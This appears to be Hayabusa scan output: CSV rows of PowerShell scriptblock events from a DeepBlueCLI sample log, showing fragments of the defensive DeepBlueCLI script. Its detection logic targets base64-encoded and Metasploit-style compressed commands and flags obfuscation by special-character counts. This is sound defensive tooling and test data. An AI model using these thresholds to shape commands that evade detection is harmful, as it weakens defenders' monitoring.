# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.485 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.516 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.516 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.517 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.518 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:28.692 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:30.619 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.969 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" 
#$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # 
File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
